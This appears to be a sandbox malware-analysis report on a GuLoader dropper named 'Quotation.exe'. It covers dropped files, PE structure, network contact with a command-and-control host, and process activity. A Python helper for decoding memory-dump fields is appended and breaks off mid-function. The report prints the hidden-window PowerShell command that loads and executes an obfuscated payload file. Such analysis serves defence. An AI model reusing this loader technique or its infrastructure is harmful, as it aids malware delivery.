                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:false
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            Process:C:\Users\user\Desktop\Quotation.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):793014
                                            Entropy (8bit):0.4265128622330899
                                            Encrypted:false
                                            SSDEEP:768:8sUDJYwTA2VcXemhzPw4bs939gcZ5EROwm6hvObs7GER6pgudNmgb3bDFS7BWGpc:nlvci
                                            MD5:EBFE35622A723856BAFC58B337B6B544
                                            SHA1:70ED02B5753E7BA5CA5B27974324EABFB0E7E283
                                            SHA-256:BF275129317E5F505CA60F20E28A899C01DEA34157597F8152FF7EAE2F7CD474
                                            SHA-512:F09155DA5B96B9C4AF1584B55DD993BE1A76836D941DB040393AE4641CE6BF33FBCBEBA985B0A8155682729CE2074E79670348FBDC370EDC3C5EECC8DA42B106
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\Quotation.exe
                                            File Type:ASCII text, with very long lines (376), with no line terminators
                                            Category:dropped
                                            Size (bytes):376
                                            Entropy (8bit):4.199662364231632
                                            Encrypted:false
                                            SSDEEP:6:QZXWIGXJ+5D6K7Q+rZqIv+uA3yyrEBjVgqB7TyzDNOEj4PGFbK0IUGucPpPuSqdP:u30J24iHA3IvBfKDhj+LduLdAAu6
                                            MD5:1D4D497D8A357DFDFEFF3F674A1EB0ED
                                            SHA1:3631BE0426E1C85F24D997CFCD7CE73CC73939C0
                                            SHA-256:7F5F923C94916C0194875A56B804D5DC852F5A8941E6CB79998D95CE28D07DF1
                                            SHA-512:5A626CC44A88EFD9EB3CC3AFFB33989892C53DCC59700EE202D8E414C64D734A0A1088B0E5ED26AD972ABC01C1C23AE243559FF64A6BA234BA8047F841FFF0D2
                                            Malicious:false
                                            Preview:landsdele terminalinterface geologers materialeforvaltere blitzpre telephoning.lasten tranquiliser procavia,frontbetjent omskiftet sordidness voussoirs tinnet underguard est.taanserne apesthetize udfrielsernes uncalorific footballs,humanitaer cigartnders liveners staboy faldstammes fastholdelses,stentjskrukkes operably pantdress sinteren seventeenthly undflyedes ryddeliges.
                                            Process:C:\Users\user\Desktop\Quotation.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):514030
                                            Entropy (8bit):0.4310374641562281
                                            Encrypted:false
                                            SSDEEP:768:EB1lZMTMvinTtFpxsLqLDGFq5yEFCbvLPDtmBotJQQMWYTzQVgacIQa94Q/4W:ow6
                                            MD5:0F954B1780BA88D2877109C1442BB87C
                                            SHA1:39DC22B8FFCC0BEE4D4D553829AF86BB4D1CB01D
                                            SHA-256:09AE598D60F6A379CFCA3D07FE1AC946B2CB65136BE23BE607C53BAFDF516C3D
                                            SHA-512:AED80331811301C7806F5B1DE8675F1BA4F2252769C038A491F1984FF6289C1AEABAA0741223442A6B397CF29F91E6640D8CDFE28D073C0A7626FAA2A02129FA
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\Quotation.exe
                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                            Category:dropped
                                            Size (bytes):1592
                                            Entropy (8bit):3.1966983518434473
                                            Encrypted:false
                                            SSDEEP:24:8AyKRWLgD4/BV02DeOiWvv+y+pWlqvtoLtifOJpqy:8ZgDszheOiWvvqpqqvt+tiffy
                                            MD5:99D5FFF461672C608E9DFF05E761D556
                                            SHA1:D68C30921D6D38657A6047A4974273C17E9A9976
                                            SHA-256:CB6A6A22A652339AB561FFB982BC3BA70AF9901FB79C730715B8358B72FFDD0B
                                            SHA-512:8E65EB492FA6C05D9AED378DD0E0C95C12A8B2FF1AF940BCEA5B61D5461C709DDDF066F59ADD6B0C74E3D6F763F54DD95A39F5C1999F78E591187FE80C483392
                                            Malicious:false
                                            Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................c.a.l.i.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....t.1...........Printer Shortcuts.T............................................P.r.i.n.t.e.r. .S.h.o.r.t.c.u.t.s... .t.1...........selvretfrdigheden.T............................................s.e.l.v.r.e.t.f.r.d.i.g.h.e.d.e.n... ...2...........familieforsrgeren.ska.\............................................f.a.m.i.l.i.e.f.o.r.s.r.g.e.r.e.n...s.k.a...$...]...\.A
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):55
                                            Entropy (8bit):4.306461250274409
                                            Encrypted:false
                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                            Malicious:false
                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.047498444456538
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:Quotation.exe
                                            File size:806'728 bytes
                                            MD5:833003bdb504ba4d779a2aff899859e0
                                            SHA1:8acb52c29e7edc16e99a1dcf96f2a9abc6045771
                                            SHA256:076191d0ad7379e339a2824bb74c2c1906477a32be3f92318c436500cdcf0af9
                                            SHA512:d0e8eb7838074bb64d389439cb5e0db0b238dfe4e68089828de63d675815b95a0606613d18dfa8dc0ecf35c62128808488acdfcbb06bbb3c0bc81065dc3ad462
                                            SSDEEP:12288:shUQmD3ceDqZWN1gJX58mnigb+Wj1pDpj1m2I4eoGoOI:shUD3cZWbSX584fzDpj1mMkoV
                                            TLSH:05058C13B9D82414FC2CA33E546B8E7A42777F7289BA502F75A8742345F37427A6312E
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................d...*.....
                                            Icon Hash:454d6950f2829659
                                            Entrypoint:0x403359
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x5C157F1B [Sat Dec 15 22:24:27 2018 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:b34f154ec913d2d2c435cbd644e91687
                                            Signature Valid:false
                                            Signature Issuer:E=Slimier@Geminous.Acc, O=unsympathisingly, OU="stormflodssikringen Kuplernes Stephen ", CN=unsympathisingly, L=Washington, S=District of Columbia, C=US
                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                            Error Number:-2146762487
                                            Not Before, Not After
                                            • 09/11/2023 10:55:56 08/11/2026 10:55:56
                                            Subject Chain
                                            • E=Slimier@Geminous.Acc, O=unsympathisingly, OU="stormflodssikringen Kuplernes Stephen ", CN=unsympathisingly, L=Washington, S=District of Columbia, C=US
                                            Version:3
                                            Thumbprint MD5:AB1C2A35379CD27DDD8300399BAA1FF0
                                            Thumbprint SHA-1:C05EFE580ED696F49B7A2B472783B16542FBD19E
                                            Thumbprint SHA-256:2F2BC1DCF6773F9465741B14FEB9C39628A0DB88490B0EBE3FA38A9C10E43BF1
                                            Serial:15D49F29425D75862DA241C5BD47677940A9E01D
                                            Instruction
                                            sub esp, 000002D4h
                                            push ebx
                                            push esi
                                            push edi
                                            push 00000020h
                                            pop edi
                                            xor ebx, ebx
                                            push 00008001h
                                            mov dword ptr [esp+14h], ebx
                                            mov dword ptr [esp+10h], 0040A2E0h
                                            mov dword ptr [esp+1Ch], ebx
                                            call dword ptr [004080A8h]
                                            call dword ptr [004080A4h]
                                            and eax, BFFFFFFFh
                                            cmp ax, 00000006h
                                            mov dword ptr [0042A20Ch], eax
                                            je 00007FD2E931E403h
                                            push ebx
                                            call 00007FD2E93216B5h
                                            cmp eax, ebx
                                            je 00007FD2E931E3F9h
                                            push 00000C00h
                                            call eax
                                            mov esi, 004082B0h
                                            push esi
                                            call 00007FD2E932162Fh
                                            push esi
                                            call dword ptr [00408150h]
                                            lea esi, dword ptr [esi+eax+01h]
                                            cmp byte ptr [esi], 00000000h
                                            jne 00007FD2E931E3DCh
                                            push 0000000Ah
                                            call 00007FD2E9321688h
                                            push 00000008h
                                            call 00007FD2E9321681h
                                            push 00000006h
                                            mov dword ptr [0042A204h], eax
                                            call 00007FD2E9321675h
                                            cmp eax, ebx
                                            je 00007FD2E931E401h
                                            push 0000001Eh
                                            call eax
                                            test eax, eax
                                            je 00007FD2E931E3F9h
                                            or byte ptr [0042A20Fh], 00000040h
                                            push ebp
                                            call dword ptr [00408044h]
                                            push ebx
                                            call dword ptr [004082A0h]
                                            mov dword ptr [0042A2D8h], eax
                                            push ebx
                                            lea eax, dword ptr [esp+34h]
                                            push 000002B4h
                                            push eax
                                            push ebx
                                            push 004216A8h
                                            call dword ptr [00408188h]
                                            push 0040A2C8h
                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804
                                            Name | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x49000 | 0x579b0 | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0xc3678 | 0x18d0 |
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                            .text | 0x1000 | 0x62a5 | 0x6400 | 5814efda24a547f46f687d77de540309 | False | 0.6590234375 | data | 6.431421556070023 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata | 0x8000 | 0x1396 | 0x1400 | ef1be07ca8b096915258569fb3718a3c | False | 0.453125 | data | 5.159710562612049 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data | 0xa000 | 0x20318 | 0x600 | 7d0d44c89e64b001096d8f9c60b1ac1b | False | 0.4928385416666667 | data | 3.90464114821524 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .ndata | 0x2b000 | 0x1e000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc | 0x49000 | 0x579b0 | 0x57a00 | a86807d791054a691e5772471e696d24 | False | 0.2557618580599144 | data | 5.043641157087775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                            RT_ICON | 0x492f8 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 | English | United States | 0.2293472793443205
                                            RT_ICON | 0x8b320 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.2947030640009464
                                            RT_ICON | 0x9bb48 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.45311203319502075
                                            RT_ICON | 0x9e0f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.5396341463414634
                                            RT_ICON | 0x9f198 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | English | United States | 0.5963114754098361
                                            RT_ICON | 0x9fb20 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.6835106382978723
                                            RT_DIALOG | 0x9ff88 | 0x120 | data | English | United States | 0.5138888888888888
                                            RT_DIALOG | 0xa00a8 | 0x11c | data | English | United States | 0.6056338028169014
                                            RT_DIALOG | 0xa01c8 | 0xc4 | data | English | United States | 0.5918367346938775
                                            RT_DIALOG | 0xa0290 | 0x60 | data | English | United States | 0.7291666666666666
                                            RT_GROUP_ICON | 0xa02f0 | 0x5a | data | English | United States | 0.7777777777777778
                                            RT_VERSION | 0xa0350 | 0x320 | data | English | United States | 0.46625
                                            RT_MANIFEST | 0xa0670 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                                            DLL | Import
                                            KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                            USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                            GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                            SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                            ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                            COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                            ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                            Language of compilation system | Country where language is spoken | Map
                                            English | United States |
                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Mar 29, 2024 07:31:43.994138002 CET | 49710 | 443 | 192.168.2.16 | 104.128.228.214
                                            Mar 29, 2024 07:31:43.994174957 CET | 443 | 49710 | 104.128.228.214 | 192.168.2.16
                                            Mar 29, 2024 07:31:43.994265079 CET | 49710 | 443 | 192.168.2.16 | 104.128.228.214
                                            Mar 29, 2024 07:31:44.001677036 CET | 49710 | 443 | 192.168.2.16 | 104.128.228.214
                                            Mar 29, 2024 07:31:44.001691103 CET | 443 | 49710 | 104.128.228.214 | 192.168.2.16
                                            Mar 29, 2024 07:32:16.093488932 CET | 49710 | 443 | 192.168.2.16 | 104.128.228.214
                                            Mar 29, 2024 07:32:17.115664959 CET | 49712 | 443 | 192.168.2.16 | 104.128.228.214
                                            Mar 29, 2024 07:32:17.115696907 CET | 443 | 49712 | 104.128.228.214 | 192.168.2.16
                                            Mar 29, 2024 07:32:17.115803003 CET | 49712 | 443 | 192.168.2.16 | 104.128.228.214
                                            Mar 29, 2024 07:32:17.116147041 CET | 49712 | 443 | 192.168.2.16 | 104.128.228.214
                                            Mar 29, 2024 07:32:17.116161108 CET | 443 | 49712 | 104.128.228.214 | 192.168.2.16
                                            Mar 29, 2024 07:32:49.206990957 CET | 49712 | 443 | 192.168.2.16 | 104.128.228.214
                                            Mar 29, 2024 07:32:50.280725002 CET | 49713 | 443 | 192.168.2.16 | 104.128.228.214
                                            Mar 29, 2024 07:32:50.280751944 CET | 443 | 49713 | 104.128.228.214 | 192.168.2.16
                                            Mar 29, 2024 07:32:50.280868053 CET | 49713 | 443 | 192.168.2.16 | 104.128.228.214
                                            Mar 29, 2024 07:32:50.281198025 CET | 49713 | 443 | 192.168.2.16 | 104.128.228.214
                                            Mar 29, 2024 07:32:50.281213999 CET | 443 | 49713 | 104.128.228.214 | 192.168.2.16
                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Mar 29, 2024 07:31:43.880685091 CET | 50948 | 53 | 192.168.2.16 | 1.1.1.1
                                            Mar 29, 2024 07:31:43.989120007 CET | 53 | 50948 | 1.1.1.1 | 192.168.2.16
                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                            Mar 29, 2024 07:31:43.880685091 CET | 192.168.2.16 | 1.1.1.1 | 0x5cce | Standard query (0) | apwisulsel.sa.com | A (IP address) | IN (0x0001) | false
                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                            Mar 29, 2024 07:31:43.989120007 CET | 1.1.1.1 | 192.168.2.16 | 0x5cce | No error (0) | apwisulsel.sa.com | | 104.128.228.214 | A (IP address) | IN (0x0001) | false

                                            Target ID:0
                                            Start time:07:31:09
                                            Start date:29/03/2024
                                            Path:C:\Users\user\Desktop\Quotation.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Quotation.exe"
                                            Imagebase:0x400000
                                            File size:806'728 bytes
                                            MD5 hash:833003BDB504BA4D779A2AFF899859E0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:07:31:13
                                            Start date:29/03/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"powershell" -windowstyle hidden "$Betalingsdages=Get-Content 'C:\Users\user\AppData\Local\Temp\springvandenes\Intransparency\Bowleres.Hed';$Taplet=$Betalingsdages.SubString(58707,3);.$Taplet($Betalingsdages)"
                                            Imagebase:0xd50000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2098766772.000000000D38C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:07:31:13
                                            Start date:29/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6684c0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:07:31:14
                                            Start date:29/03/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
                                            Imagebase:0xf20000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:5
                                            Start time:07:31:16
                                            Start date:29/03/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                            Imagebase:0x7ff62c440000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:14
                                            Start time:07:31:39
                                            Start date:29/03/2024
                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                            Imagebase:0x3b0000
                                            File size:516'608 bytes
                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.2383373007.0000000005D2E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false

                                              Execution Graph

                                              Execution Coverage:7%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:3.2%
                                              Total number of Nodes:185
                                              Total number of Limit Nodes:8
                                              execution_graph: serialized node and edge data for the interactive graph viewer (not reproduced); the graph's labelled API nodes are GetSystemInfo, CreateNamedPipeW, GetFileAttributesW, ComputeAccessTokenFromCodeAuthzLevel and IdentifyCodeAuthzLevelW.

                                              Control-flow Graph

                                              control_flow_graph: serialized basic-block edge data for the interactive graph viewer (not reproduced); the function spans 83a29b8-83a4075 and contains calls to 83a45ea and 83a4654.
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #j^$3j^$Sj^$cj^
                                              • API String ID: 0-1157050092
                                              • Opcode ID: e98938b25d58ae31e152660a2e5a43da1c64a3a20f340d987db93b8dcb8cbb84
                                              • Instruction ID: e2b9b5f59f489162e68fd8734442e295867500443e7a227f69a7dffd82546218
                                              • Opcode Fuzzy Hash: e98938b25d58ae31e152660a2e5a43da1c64a3a20f340d987db93b8dcb8cbb84
                                              • Instruction Fuzzy Hash: 45D29274E012298FDB65DF68C894B9EB7F5BB88301F1081E9E809E7351DB35AE818F50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

Control-flow Graph
• Function entry 08359594; basic blocks 08359594-08359C5A; CreateNamedPipeW is called from block 08359B7A-08359BE8; the final block at 08359C5A branches to itself (rendered graph with executed/not-executed colouring omitted)
                                              APIs
                                              • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 08359BD8
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091688582.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8350000_powershell.jbxd
                                              Similarity
                                              • API ID: CreateNamedPipe
                                              • String ID:
                                              • API String ID: 2489174969-0
                                              • Opcode ID: 9dc3019d10f56755a32028a8f684c01940847a0b25660c98dfdfcff083f4a217
                                              • Instruction ID: 1a9a30618970ed4fd090e8baf1f9f6a0121896c4ba6c7ea901d1a9d8804129b5
                                              • Opcode Fuzzy Hash: 9dc3019d10f56755a32028a8f684c01940847a0b25660c98dfdfcff083f4a217
                                              • Instruction Fuzzy Hash: 6E51F771D01358DFDB14CFAAD884B9DBFF6AF88305F24812AE818AB260D7749980CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

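The numeric fields in these listings are easier to triage once decoded. The block below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the memory-dump file name shown under Memory Dump Source and decodes the CreateNamedPipeW dwOpenMode argument (40080003) using the standard winnt.h/winbase.h constants. The .sdmp field layout (process index, snapshot index, region id, base address, page protection, an undecoded field, region type, an undecoded field) is an assumption inferred from the report's own Offset line and is labelled as such in the code; the function and class names are mine.

```python
"""Decode the numeric fields that appear in the function listings above:
the Joe Sandbox memory-dump file name and the CreateNamedPipeW dwOpenMode
argument. Constants are from winnt.h / winbase.h; the .sdmp field layout is
an assumption inferred from the report's own "Offset:" line."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Page protection constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
# Region type constants (winnt.h, MEMORY_BASIC_INFORMATION.Type).
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout of a Joe Sandbox .sdmp name, e.g.
# 00000002.00000002.2091688582.0000000008350000.00000040.00000800.00020000.00000000.sdmp
# proc.snapshot.regionid.base.protect.<unknown>.type.<unknown>; only base, protect
# and type are decoded here, the two unknown fields are kept raw.
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<snap>[0-9A-Fa-f]{8})\.(?P<region>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class Region:
    process_index: int
    snapshot: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        base = PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:02X}")
        mods = [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join([base, *mods])

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:08X}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)      # any PAGE_EXECUTE* value

    @property
    def writable(self) -> bool:
        return bool(self.protect & 0xCC)      # READWRITE, WRITECOPY and their EXECUTE variants

    @property
    def image_backed(self) -> bool:
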